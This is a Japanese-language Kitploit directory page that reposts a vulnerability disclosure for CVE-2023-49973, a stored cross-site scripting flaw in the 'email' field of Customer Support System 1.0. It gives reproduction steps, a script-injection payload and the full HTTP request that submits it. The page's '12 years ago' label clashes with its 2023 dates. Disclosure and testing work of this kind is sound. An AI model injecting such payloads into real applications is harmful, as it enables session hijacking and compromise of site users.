Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-49973 — Customer Support System 1.0 - 「customer_list」ページの"email"フィールド/パラメータにおけるクロスサイトスクリプティング(XSS)脆弱性 | Kitploit
ツール/GitHubGitHub/geraldoalcantara/cve-2023-49973
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubgeraldoalcantara/cve-2023-49973

CVE-2023-49973

Customer Support System 1.0 - 「customer_list」ページの"email"フィールド/パラメータにおけるクロスサイトスクリプティング(XSS)脆弱性

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-49973

Customer Support System 1.0 - 「customer_list」ページの"email"フィールド/パラメータにおけるクロスサイトスクリプティング(XSS)脆弱性

説明: Customer Support System 1.0は格納型XSSに対して脆弱です。Customer Support Systemのバージョン1にXSS脆弱性が存在します。悪意のあるユーザーは、顧客の編集・作成時に"email"フィールド/パラメータを介してJavaScriptコードを挿入できます。このコードは、"/customer_support/index.php?page=customer_list"ページが訪問されるたびに実行されます。

脆弱性のある製品バージョン: Customer Support System 1.0
CVE作成者: Geraldo Alcântara
日付: 2023年11月28日
確認日: 2023年12月19日
CVE: CVE-2023-49973
テスト環境: Windows

再現手順:

  1. アプリケーションにログインします。
  2. 既存の顧客を編集するには "/customer_support/index.php?page=customer_list" に、新しい顧客を作成するには "/customer_support/index.php?page=new_customer" に移動します。
  3. 顧客を作成または編集し、悪意のあるペイロードを"email"フィールド/パラメータに挿入します。
  4. ペイロード:
root@kitploit:~
</dt></b><script>alert(document.domain)</script>

リクエスト:

root@kitploit:~
POST /customer_support/ajax.php?action=save_customer HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212391604122778812451614149575
Content-Length: 1149
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_customer
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3

-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="id"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="firstname"

teste
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="middlename"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="lastname"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="contact"

210
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="address"

asdasd
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="email"

</dt></b><script>alert(document.domain)</script>
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="password"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="cpass"

xss
-----------------------------212391604122778812451614149575--

発見者/クレジット:
Geraldo Alcântara

ツールをダウンロード